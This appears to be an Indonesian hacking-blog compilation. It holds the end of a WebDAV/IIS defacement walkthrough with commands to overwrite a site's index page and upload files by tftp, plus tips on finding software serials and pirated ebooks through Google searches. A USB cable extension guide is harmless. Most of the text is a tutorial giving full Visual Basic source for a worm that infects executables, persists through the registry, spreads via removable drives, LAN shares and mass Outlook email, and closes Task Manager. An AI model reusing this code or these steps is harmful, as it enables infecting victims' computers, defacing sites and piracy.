    Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:

    C:\inetpub\wwwroot> copy index.html indexold.html

    C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html

    Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:

    C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html

    Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:

    C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100

    Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

    5) Kesimpulan

    Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.

    Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

    Chintan Trivedi
    chesschintan@hotmail.com

    tips n triks : belajar Linux dengan bantuan VMware Workstation

    tips n triks : belajar Linux dengan bantuan VMware Workstation

    VMware merupakan program untuk membuat virtual machine, sehingga kita bisa menjalankan dua OS sekaligus, VMware dapat di download di http://www.vmware.com/ sayang bukan merupakan freeware, namun untuk keperluan belajar kiranya ga ada salahnya kita cari S/N nya dengan bantuan google Phd.

    Instalasi VMware mudah dilakukan, saya kira tidak perlu dibahas , kembali ke tujuan awal yaitu menggunakan VMware sebagai alat bantu belajar Linux. VMware tersedia
    untuk Windows maupun Linux, diatas Virtual machine dr VMware kita dapat menginstall berbagai OS seperti; Windows, linux, freeBSD, dll.
    Untuk artikel ini saya batasi VMware di install di atas OS windows dan nantinya kita akan menginstall Linux diatas virtual machine dari VMware tadi. Adapun gambaran umumnya sebagai berikut:
    1. Instalasi VMware dengan OS dasar Windows.
    2. Instalasi Linux pada virtual machine dr VMware.
    3. Linux pada virtual machine kita perlakukan sebagai Server.
    4. Windows kita perlakukan sebagai client.
    5. siapkan program pembantu lain seperti (putty, winscp, ... tanya aja google Phd. dimana downloadnya qe3).
    6. lakukan konfigurasi ke server Linux dengan bantuan putty (pura²nya remote dari jarak jauh).
    7. Latihan Konfigurasi server DNS, apache, Samba, dll. sudah siap dilakukan.
    8. dengan bantuan VMware kita dapat melakukan latihan nginstall, konfigurasi, sekuriti, nyoba exploit, ato bugs, Seru deh learn with Fun.... Selamat mencoba.

    Masalah yang sering timbul
    1. koneksi ke server error >> baca manualnya dah qe3

    Mendapatkan eBook Dengan Google Hack

    Date: Sunday, February 05, 2006 Hits: 15030 By: HR
    Saya yakin banyak yang sudah tahu mengenai teknik google hack ini. Dalam buku saya “Hack Attack” dibahas mengenai syntax-syntax yang bisa digunakan seperti site, inurl, intitle dan sebagainya. Juga dibahas tips dan trik bagaimana mendapatkan & melihat resume orang lain dengan google dan berbagai trik-trik lainnya.

    Dalam kesempatan ini, saya akan memberikan tips dengan google untuk mendapatkan eBook gratis. Maklum, buku bahasa Inggris itu mahal bo ! Apalagi di jaman yang serba susah saat ini. Tips dan trik berikut ini memberikan cara mendapatkan ebook, namun resiko ditanggung sendiri ya. Maklum, banyak ebook yang juga ilegal alias bajakan BO. Bagi yang belum punya Harry Potter terakhir versi bahasa Inggris. Tenang, anda juga akan bisa mendapatkannya dengan gampang. Just One CLICK, my friend!!!

    Bagi saya, “Knowledge is Free” tapi juga sangat tergantung kita mau membaginya atau tidak. Bagi yang sudah tahu dan sering menggunakan google, trik ini mungkin sudah basi, tapi bagi yang belum, akan membuat google semakin menarik ?.

    OK, saya akan langsung memberikan tips menggunakan google untuk mendapatkan ebook.

    Seperti yang kita ketahui, ada banyak situs di Internet yang memungkinkan kita untuk share file atau upload file dalam ukuran besar seperti megaupload.com atau bigupload.com atau rapidshare. Situs-situs seperti ini banyak digunakan untuk share file-file yang berisi video, audio dan yang paling penting adalah eBook GRATIS. Biasanya link yang diprovide juga punya jangka waktu tertentu dari sejak file tersebut di-upload. Oleh sebab itu hasil search dengan google - memberikan link yang kita cari - tidak menjamin bahwa link tersebut expired atau tidak. Atau terkadang dihapus oleh empunya sang situs karena file yang di-share diketahui adalah file bajakan sehingga mereka tidak ingin mengambil resiko.

    Baik, kita akan mulai search dengan google dengan menggunakan keyword berikut

    site:megaupload.com "ebook"

    Bingo, hasilnya adalah berupa link-link seperti di bawah ini yang hanya saya tampilkan beberapa saja, termasuk buku HARRY Potter, Suse dan Project Management.

    MEGAUPLOAD.com
    Filename: Suse 9.3 For Dummies - ebook.zip. Downloads: 2. Filesize: 6.8 MB. Description: Suse 9.3 ebook. Advertise with us • Report abuse • Contact us ...
    www.megaupload.com/?d=25UG6OJZ - 37k - Supplemental Result - Cached - Similar pages
    MEGAUPLOAD.com
    Description: Harry.Potter.And.The.Half.Blood.Prince.eBooK.iNTERNAL-DeFaCto - Upload by Staz. Advertise with us • Report abuse • Contact us • Privacy policy ...
    www.megaupload.com/?d=31XZ02EO - 37k - Supplemental Result - Cached - Similar pages
    http://www.megaupload.com/?d=31XZ02EO

    MEGAUPLOAD.com
    Description: Que.Absolute.Beginners.Guide.to.Project.Management.Apr.2005.eBook-BBL. Advertise with us • Report abuse • Contact us • Privacy policy ...
    www.megaupload.com/?d=37AR7ZEN - 41k - Supplemental Result - Cached - Similar pages

    Terlihat dari hasil search bahwa buku Project Management ini merupakan buku baru terbitan April 2005. Amazing bukan ? Anda mungkin tidak perlu ke Mangga Dua atau Glodok lagi untuk membeli CD ebook hehe. Keywordnya bisa divariasikan dengan keyword lain seperti mungkin Cisco, Microsoft, network dan sebagainya.

    Ingin tips yang lain lagi dengan Google? Untuk Syntax detil dari google hack dan beberapa cara untuk hacking dengan google bisa dilihat di buku “Hack Attack”.
    Di lain kesempatan, saya akan tampilkan tips lainnya. Tunggu saja tanggal mainnya ? - ?

    Sekali lagi, saya tidak bertanggung jawab atas yang dilakukan berkaitan dengan artikel ini. Saya hanya ingin “share” sedikit knowledge yang mungkin bermanfaat.
    Dan seperti biasa, saran dan input bisa dikirim ke email harry2009@gmail.com
    Atau berikan comment anda di hr2009.blogspot.com

    HR - Author of “Hack Attack” – Konsep, Penerapan dan Pencegahan



    Source: JASAKOM Information Center

    Rabu, 15 Oktober 2008

    Memperpanjang Kabel USB dengan Kabel UT

    download materi

    Pada kesempatan kali ini saya akan berusaha menulis dan mejelaskan cara membuat USB Extender dengan perpanjangan menggunakan Kabel UTP, agar dapat lebih memperjelas tulisan ini, saya juga menyertakan gambar/ foto dari album foto Pa Egoen. Sebelum nya saya ucapkan terima kasih buat Pak Goen, yang selalu memberikan inspirasi2 baru.
    Ok, Mengapa kita perlu kabel USB yang panjang? Karena kabel Usb yang tersedia di Pasaran biasanya maksimal cuma 1-1,5 mtr. Walau sebenarnya ada yang 10-20 mtr, tapi jarang ada dan biasanya memerlukan USB repeater (klo ga salah itu namanya) untuk memperkuat aliran data di USB yang cukup panjang. yang menjadi masalah adalah harga USB repeater tersebut cukup mahal untuk saya beli, untunglah Pak Goen memberikan solusi dengan memperpanjang kabel USB menggunakan kabel UTP. Karena klo kabel USB nya diperpanjang dengan UTP kemungkinan besar untuk 20 mtr masih bisa tanpa USB Repeater(walaupun masih tergantung sama USB nya yang di Motherboard juga). Biasanya keperluan kabel USB panjang ini digunakan untuk pemasangan antena USB WiFi OutDoor, perpanjangan kabel printer,USB HUB, dll...
    Disaranakan menggunakan USB ver 1.0, karena berdasarkan pengalaman. Trik ini hampir selalu berhasil pada USB ver 1.0
    Baiklah, kita langsung pada prakteknya saja. Bahan dan peralatan yang perlu disiapkan adalah:
    1. Kabel UTP, panjang nya sesuai dengan keperluan. Tetapi saya sarankan tidak lebih dari 20 meter. Kalau lebih dari 20 meter, akan diperlukan usb repeater/ usb extender untuk memperkuat aliran data dan daya.
    2. Kabel USB
    3. Rubber tape
    4. Thermofit/ kondom kabel (optional)
    5. Pipa pvc kecil
    6. Gunting
    7. Solder


    Setelah semua bahan disiapkan, yang pertama harus dilakukan adalah Kupas kabel UTP pada kedua ujung nya. Dan di bagi menjadi 4 bagian seperti pada gambar di bawah ini. Pembagian nya, kabel orange di gabung dengan kabel putih-orange, putih-biru, hijau dan sisanya dari 4 kabel digabung menjadi satu.

    Selanjutnya, kabel usb yang sudah disiapkan tadi dipotong manjadi 2 bagian.


    Kemudian ujung2nya di kupas, seperti pada gambar dibawah:


    Tahap selanjutnya, masukkan pipa pvc kecil/ pipauntuk pelindung sambungan ke masing masing ujung bakel UTP


    Dan, begitu juga pada bagian kabel usb nya. Masukkan kondom pembungkus kabel pada masing masing bagian kabel USB.


    Selanjutnya, sambungkan kabel UTP dengan kabel USB, dengan urutan seperti gambar di bawah ini, sangat disarankan menggunakan solder, karena dari pengalaman saya ketika tidak menggunakan solder, USB device tidak terdetek oleh computer walaupun sudah diset menjadi USB versi 1.0:


    Setelah semua kabel tersambung, bungkus sambungan tersebut menggunakan kondom kabel/ thermofit.


    Dan setelah itu, bungkus kembali sambungan tadi dengan pipa pvc kecil.


    Sekarang, kabel USB sudah siap digunakan untuk keperluan antenna Wajanbolic menggunakan USB WiFi/ USB WLAN


    Semoga bisa bermanfaat.
    Yusda R. Noor
    YM: yusda_46
    yusdas@gmail.com
    http://dieysuck.wordpress.com
    http://rizaldi.net

    Teknik Pembuatan Virus Komputer

    Teknik Pembuatan Virus Komputer

    Syarat sebuah virus computer :
    1. Menyembunyikan prosesnya dari pemakai
    2. Mengaktifkan dirinya setiap startup sistem
    3. Menyebarkan dirinya melalui media file executable
    4. Mempercepat proses penyebarannya melalui media pertukaran data dan informasi
    5. Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system
    6. Menyebarkan dirinya dengan filename spoofing.
    7. Mempercepat proses penyebarannya dengan pendekatan social engineering
    8. Berusaha mempertahankan existensi dirinya

    Tanpa menggunakan teori yang panjang dan lebar, kita akan membahas bagaimana hal tersebut diatas dapat dilakukan dengan menggunakan bahasa pemrograman Visual Basic.

    Menyembunyikan prosesnya dari pemakai

    Agar program tidak menampilkan dirinya pada Task Bar, dapat digunakan perintah :

    App.TaskVisible = False

    Kemudian untuk menyembunyikan form dapat menggunakan :

    Me.Visible = False

    Mengaktifkan dirinya setiap startup sistem

    Agar program exe dapat diaktifkan setiap kali startup system, kita dapat menduplikasi program ke suatu folder dengan perintah :

    FileCopy app.Path & "\" & app.EXEName , environ$("windir") & "\" & app.EXEName

    dan menambah ke registry :

    Dim WShell as Object
    Set WShell = CreateObject("WScript.Shell")
    WShell.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\virusku", environ$("windir") & "\" & app.EXEName
    Set WShell = Nothing
    Menyebarkan dirinya melalui media file executable

    Program virus harus dapat menginfeksi program-program executable dengan proses sebagai berikut :

    Program Executable

    Setelah terinfeksi oleh program virus menjadi :

    Program Virus + Program Executable + Ukuran Virus + Signature Virus

    Sehingga setiap kali program yang telah terinfeksi dijalankan, maka Program Virus akan menginstalasi dirinya ke computer korban dan mengembalikan proses ke Program Executable.

    Jadi pada saat program terinfeksi dijalankan, maka Program Executable harus di pulihkan kembali dengan melakukan perhitungan :

    Posisi Program Executable = Ukuran File – Ukuran Virus – Ukuran Signature Virus

    Sesuatu hal yang harus diperhatikan adalah infeksi terhadap Program Executable tidak boleh dilakukan berulang-ulang dan tidak boleh menginfeksi diri Program Virus sendiri, sehingga harus ditambahkan suatu Signature Virus

    Private Sub PeriksadanInfeksiExe(fname As String)
    Dim tSignature As String * 5
    Dim OriginalCode As String
    Dim fNum As Integer
    'Jangan menginfeksi diri sendiri
    'Hanya menginfeksi file berukuran lebih dibawah 1 Mega
    If Dir(fname) <> "" Then
    If FileLen&(fname) > virSize And FileLen&(fname) < 1048576 Then
    'Ambil nomor file
    fNum = FreeFile
    Open fname For Binary Access Read As fNum 'Buka file target
    Seek fNum, LOF(fNum) - 5 + 1 'pindah file pointer ke posisi Signature Virus
    tSignature = Space$(5)
    Get fNum, , tSignature 'baca tSignature
    Close fNum
    If tSignature <> virSignature Then 'jika file virus (tidak ada virSignature)
    On Error GoTo finally
    Open fname For Binary Access Read Write As fNum 'Buka file target
    OriginalCode = Space$(LOF(fNum))
    Get fNum, , OriginalCode 'baca Program Executable
    Put fNum, 1, virCode 'tulis Program Virus diawal
    Put fNum, , OriginalCode 'tulis Program Executable
    Put fNum, , virSize 'tulis Ukuran Virus
    Put fNum, , virSignature 'tulis Signature Virus
    Close fNum
    finally:
    End If
    End If
    End If
    End Sub

    Ketika program Executable dijalankan maka :

    Private Sub VirusInitial()
    Dim OriginalCode As String
    Dim tSignature As String * 5
    Dim fNum As Integer
    Dim fname As String

    virSignature = Chr$(3) + Chr$(53) + Chr$(103) + Chr$(153) + Chr$(203)

    Open exePath + App.EXEName + ".exe" For Binary Access Read As #1
    Seek #1, LOF(1) - 5 + 1 'pindah file pointer ke posisi virSize
    tSignature = Space$(5)
    Get #1, , tSignature 'baca virSignature

    If tSignature <> virSignature Then 'Jika file virus sendiri
    virSize = LOF(1) 'ukuran virSize sama dengan ukuran file
    virCode = Space$(virSize) 'siapkan buffer virCode
    Seek #1, 1 'ke posisi bof
    Get #1, , virCode 'baca virCode sebesar ukuran virSize
    Close #1

    Call VirInstall 'instalasi virus

    If Not SudahLoad Then
    Load ff 'aktifkan timer virus
    End If

    'Jika file yang terinfeksi
    Else
    Seek #1, LOF(1) - 9 + 1 'pindah file pointer ke posisi virSize
    Get #1, , virSize 'baca virSize (long = 4 byte)
    'Baca vircode
    virCode = Space$(virSize)
    Seek #1, 1 'ke posisi BOF (Awal file)
    Get #1, , virCode 'baca virCode sebesar ukuran virSize

    OriginalCode = Space$(LOF(1) - virSize) 'siapkan buffer
    Get #1, , OriginalCode 'baca originalCode

    fNum = 0
    Do While Dir(exePath & App.EXEName & fNum & ".exe") <> ""
    fNum = fNum + 1
    Loop

    fname = exePath & App.EXEName & fNum & ".exe"

    On Error GoTo finally
    Open fname For Binary Access Write As #2
    Put #2, , OriginalCode 'tulis ke file sementara
    Close #2 'tutup file sementara
    finally:

    Close #1

    Call VirInstall

    If Not SudahLoad Then
    Load ff 'aktifkan timer virus
    End If

    Call ExecuteOriginal(fname)
    Kill fname 'hapus file sementara
    End If
    End Sub

    Private Sub ExecuteOriginal(fname)
    Dim Host As Long, HProc As Long, HExit As Long
    Host = Shell(fname, vbNormalFocus) 'jalankan fname
    HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
    GetExitCodeProcess HProc, HExit 'ambil status aktif
    Do While HExit = STILL_ACTIVE 'proses ditahan selama proses masih aktif
    DoEvents 'lakukan event yang lain
    GetExitCodeProcess HProc, HExit
    Loop
    End Sub

    Private Function SudahLoad() As Boolean
    Dim vir_hwnd As Long
    'Jika Jendela virus aktif
    vir_hwnd = FindWindow(vbNullString, titleSudahLoad)
    SudahLoad = Not (vir_hwnd = 0)
    End Function
    Mempercepat proses penyebarannya melalui media pertukaran data dan informasi

    Menyebarkan dirinya ke Floppy Disk, diaktifkan dengan suatu timer. Program ini bekerja dengan senantiasa memantau terhadap keaktifkan jendela 3½ Floppy (A:) oleh pemakai.

    Public Sub InfeksiFloppy()
    On Error GoTo BatalInfeksi
    Dim floppy_hwnd As Long
    Dim fname As String
    'Jika Jendela Floppy terbuka
    floppy_hwnd = FindWindow(vbNullString, "3½ Floppy (A:)")
    If Not floppy_hwnd = 0 Then
    Call InfeksiResource("A:", "DOCXLS") 'Hanya infeksi Doc, Exe jangan
    End If
    BatalInfeksi:
    End Sub

    Menyebarkan dirinya ke Flash Disk, diaktifkan dengan suatu timer. Program ini bekerja dengan senantiasa memantau removable drive diatas drive C.

    Public Sub InfeksiFlashDisk()
    On Error GoTo BatalInfeksi
    Dim ObjFSO As Object
    Dim ObjDrive As Object
    Set ObjFSO = CreateObject("Scripting.FileSystemObject")
    For Each ObjDrive In ObjFSO.Drives
    'Asumsi semua removable drive diatas huruf C adalah flash disk
    '1 - Removable drive
    '2 - Fixed drive (hard disk)
    '3 - Mapped network drive
    '4 - CD-ROM drive
    '5 - RAM disk
    If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C" Then
    Call InfeksiResource(ObjDrive.DriveLetter + ":", "XLSDOC")
    End If
    Next
    BatalInfeksi:
    End Sub

    Menyebarkan dirinya ke semua resource yang di Share pada computer yang terinfeksi :

    Public Sub InfeksiMySharing()
    Dim shares() As String, share As Variant, target As String
    If GetShares("\\127.0.0.1", "Microsoft Windows Network", shares) = True Then
    For Each share In shares
    target = share
    Call InfeksiResource(target, "XLSDOCEXE")
    Next share
    End If
    End Sub

    Menyebarkan dirinya ke semua resource share yang terbuka di LAN, dengan mengambil semua Domain maupun Workgroup dan menyimpannya dalam suatu stack.

    Public Sub AmbilDomain()
    Dim Domains() As String, Domain As Variant
    If GetShares("", "Microsoft Windows Network", Domains) = True Then
    For Each Domain In Domains
    If Not stackDomain.isFull Then
    stackDomain.Push (Domain)
    End If
    Next Domain
    End If
    End Sub

    Kemudian mengambil computer yang berada pada masing-masing Domain maupun Workgroup dalam suatu stack.

    Public Sub AmbilComputer()
    Dim Computers() As String, Domain As String, Computer As Variant
    If Not stackDomain.isEmpty() Then
    Domain = stackDomain.Pop()
    If GetShares(Domain, "Microsoft Windows Network", Computers) = True Then
    For Each Computer In Computers
    If Not stackComputer.isFull Then
    stackComputer.Push (Computer)
    End If
    Next Computer
    End If
    End If
    End Sub

    Dan Akhirnya mengambil semua resource yang dishare dari masing-masing Computer :

    Public Sub AmbilDrive()
    Dim Drives() As String, Computer As String, Drive As Variant
    If Not stackComputer.isEmpty() Then
    Computer = stackComputer.Pop()
    If GetShares(Computer, "Microsoft Windows Network", Drives) = True Then
    For Each Drive In Drives
    If Not stackDrive.isFull Then
    stackDrive.Push (Drive)
    End If
    Next Drive
    End If
    End If
    End Sub

    Public Sub InfeksiNetworkDrive()
    Dim target As String
    If Not stackDrive.isEmpty() Then
    target = stackDrive.Pop()
    Call InfeksiResource(target, "XLSDOCEXE")
    End If
    End Sub
    Melakukan penyebaran melalui fasilitas email :

    Public Sub SpreadEmailOutlook()
    Dim Outlook As Object
    Dim Mapi As Object
    Dim Mail As Object
    Dim AddressBook As Variant
    Dim MailAddress As Variant
    Dim i As Integer, j As Integer

    On Error GoTo finally
    Set Outlook = CreateObject("Outlook.Application")
    Set Mapi = Outlook.GetNamespace("MAPI")

    For i = 1 To Mapi.AddressLists.Count
    Set AddressBook = Mapi.AddressLists(i)
    For j = 1 To AddressBook.AddressEntries.Count
    MailAddress = AddressBook.AddressEntries(j)

    Set Mail = Outlook.CreateItem(0)

    Mail.Recipients.Add (MailAddress)
    Mail.Subject = "Subject Virus Anda"
    Mail.Body = vbCrLf & "Pesan anda agar pemakai tertarik membuka attachment."
    Mail.Attachments.Add Environ$("windir") & "\" & attachment & ".doc.exe"
    Mail.Send
    Next
    Next

    finally:
    Set Outlook = Nothing
    Set Mapi = Nothing
    End Sub

    Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system

    Penulis tidak akan membahas tentang teknik yang satu ini. Pada dasarnya cara kerjanya adalah seperti ini, misalnya pada Windows yang otomatis menjalankan file dengan script extension tertentu (Contoh teknik virus Redlof), sehingga program virus dapat membuat script tersebut untuk mentrigger program virus.

    Ada juga worms yang memanfaatkan kelemahan Outlook Express, dimana secara otomatis menjalankan Attachment tanpa klik dari pemakai.

    Ada juga worms yang menyebarkan diri melalui website, dimana jika anda mengunjungi suatu website dengan software browser yang memiliki kelemahan, maka secara otomatis browser mendownload kode yang tidak diinginkan dan menjalankannya.

    Ada juga worms yang menyebar melalui media Bluetooth yang dalam keadaan terbuka.

    Menyebarkan dirinya dengan filename spoofing.

    Teknik filename spoofing banyak digunakan oleh worms dewasa ini dengan menggunakan double extension :

    Misalnya :

    SuratCinta.doc.pif

    Pada system yang settingnya tidak menampilkan extension file maka file tersebut diatas ditampilkan pada system sebagai :

    SuratCinta.doc

    Mempercepat proses penyebarannya dengan pendekatan social engineering.

    Teknik ini adalah gampang-gampang sudah, tetapi sangat mempengaruhi penyebaran dan siklus hidup virus anda. Social engineering banyak digunakan oleh hacker-hacker untuk memperdaya dengan pendekatan non-teknis computer, tetapi lebih cenderung kepada pendekatan manusia.

    Banyak virus menyebar dengan memanfaatkan kesenangan orang akan materi-materi pornografi, yaitu dengan membuat membuat nama-nama file, maupun pesan email yang memancing korban untuk penasaran membuka attachment.

    Ada juga virus yang disebarkan pada game-game maupun crack software yang menumpang pada program tersebut.

    Berusaha mempertahankan existensi dirinya

    Mencoba mematikan proses-proses program yang berpotensi untuk menghentikan proses virus, maupun tools yang dapat menghapus proses virus tersebut :

    WShell.regwrite “HKCU\ \Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableRegistryTools", 0, "REG_DWORD"
    WShell.regwrite “HKCU\ \Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableCMD", 0, "REG_DWORD"

    Maupun melacak jendela proses-proses musuh, dan menutupnya.

    Public Sub KillEnemy()
    Dim EnemyProcess(20) As String
    Dim i As Integer
    EnemyProcess(1) = "Registry Editor"
    EnemyProcess(2) = "Windows Task Manager"
    EnemyProcess(3) = "Process Viewer"
    EnemyProcess(4) = "Open With"
    For i = 1 To 4 Step 1
    Call KillEnemyWindow(EnemyProcess(i))
    Next i
    End Sub

    Private Sub KillEnemyWindow(target As String)
    Dim Enemy_hwnd As Long
    Enemy_hwnd = FindWindow(vbNullString, target)
    If Not Enemy_hwnd = 0 Then
    CloseWindow (Enemy_hwnd)
    End If
    End Sub

    Kesimpulan :

    Pemrograman virus sangat membutuhkan pengetahuan tentang bagaimana proses-proses system operasi yang berpotensi digunakan sebagai sarana penyebaran, serta perintah-perintah pemrograman yang dapat digunakan untuk mewujudkan proses tersebut. Jadi tidak diperlukan algoritma yang rumit, sehingga dapat dengan mudah dilakukan oleh programmer-programmer pemula.

    Keberhasilan menerapkan teknik social engineering akan menentukan kesuksesan dan siklus hidup virus anda.

    Lampiran A

    ‘API Declaration Modul

    Option Explicit

    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
    Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
    Public Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
    Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
    Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
    Public Declare Function CloseWindow Lib "user32" (ByVal hwnd As Long) As Long

    Public Const STILL_ACTIVE As Long = &H103
    Public Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

    Public Type NETRESOURCE
    dwScope As Long
    dwType As Long
    dwDisplayType As Long
    dwUsage As Long
    lpLocalName As Long
    lpRemoteName As Long
    lpComment As Long
    lpProvider As Long
    End Type

    Public Declare Function WNetOpenEnum Lib "mpr.dll" Alias "WNetOpenEnumA" _
    (ByVal dwScope As Long, ByVal dwType As Long, ByVal dwUsage As Long, _
    lpNetResource As NETRESOURCE, lphEnum As Long) As Long
    Public Declare Function WNetEnumResource Lib "mpr.dll" Alias "WNetEnumResourceA" _
    (ByVal hEnum As Long, lpcCount As Long, lpBuffer As NETRESOURCE, lpBufferSize As Long) As Long
    Public Declare Function WNetCloseEnum Lib "mpr.dll" (ByVal hEnum As Long) As Long
    Public Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal pString As Long) As Long
    Public Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" _
    (ByVal lpString1 As String, ByVal pString As Long) As Long

    Const RESOURCE_GLOBALNET = 2
    Const RESOURCETYPE_DISK = 1
    Const RESOURCEDISPLAYTYPE_DOMAIN = 0
    Const RESOURCEUSAGE_CONTAINER = 1

    Function GetShares(ByVal RemoteName As String, ByVal Provider As String, sShares() As String) As Boolean
    Dim hEnum As Long, nrLen As Long, nrCount As Long
    Dim nr(2048) As NETRESOURCE, retval As Boolean
    nrCount = -1
    nrLen = 65536
    RemoteName = StrConv(RemoteName, vbFromUnicode)
    nr(0).lpRemoteName = StrPtr(RemoteName)
    Provider = StrConv(Provider, vbFromUnicode)
    nr(0).lpProvider = StrPtr(Provider)
    nr(0).dwType = RESOURCEDISPLAYTYPE_DOMAIN
    nr(0).dwUsage = RESOURCEUSAGE_CONTAINER
    If WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_DISK, 0, nr(0), hEnum) = 0 Then
    If WNetEnumResource(hEnum, nrCount, nr(0), nrLen) = 0 Then
    If nrCount > 0 Then
    ReDim sShares(nrCount - 1) As String
    For nrLen = 0 To (nrCount - 1)
    sShares(nrLen) = Space(lstrlen(nr(nrLen).lpRemoteName))
    Call lstrcpy(sShares(nrLen), nr(nrLen).lpRemoteName)
    Next nrLen
    retval = True
    End If
    End If
    Call WNetCloseEnum(hEnum)
    End If
    GetShares = retval
    End Function

    Lampiran B

    ‘Form ff

    Option Explicit
    Dim SedangInfeksi As Boolean
    Dim SpreadEmail As Boolean
    Dim Aktifitas As Integer '0 = floppy, 1 = flashdisk
    Dim Loncat As Integer

    Private Sub AT_Timer()
    Call KillEnemy
    If Not SedangInfeksi Then ‘jangan overlapping proses
    SedangInfeksi = True
    If Aktifitas = 0 Then
    Call InfeksiMySharing
    ElseIf Aktifitas = 1 Then
    Call AmbilDomain
    ElseIf Aktifitas = 2 Then
    Call AmbilComputer
    ElseIf Aktifitas = 3 Then
    Call AmbilDrive
    ElseIf Aktifitas = 4 Then
    Call InfeksiNetworkDrive
    ElseIf Aktifitas = 5 Then
    Call InfeksiFloppy
    ElseIf Aktifitas = 6 Then
    'Call InfeksiFlashDisk
    ElseIf Aktifitas = 7 Then
    Call InfeksiMySharing
    ElseIf Aktifitas = 8 Then
    If Not SpreadEmail Then
    Call SpreadEmailOutlook
    SpreadEmail = True
    End If
    Aktifitas = 1
    End If
    Aktifitas = (Aktifitas + 1)
    SedangInfeksi = False
    End If
    End Sub

    Main Program
    Private Sub Form_Load()
    Me.Visible = False
    Me.Caption = titleSudahLoad
    AT.Interval = 1000
    SedangInfeksi = False
    SpreadEmail = False
    Aktifitas = 0
    Loncat = 0
    AT.Enabled = True
    End Sub
     

    Copyright © 2009 by BLACK-TARSIUS.[ NAZHA23]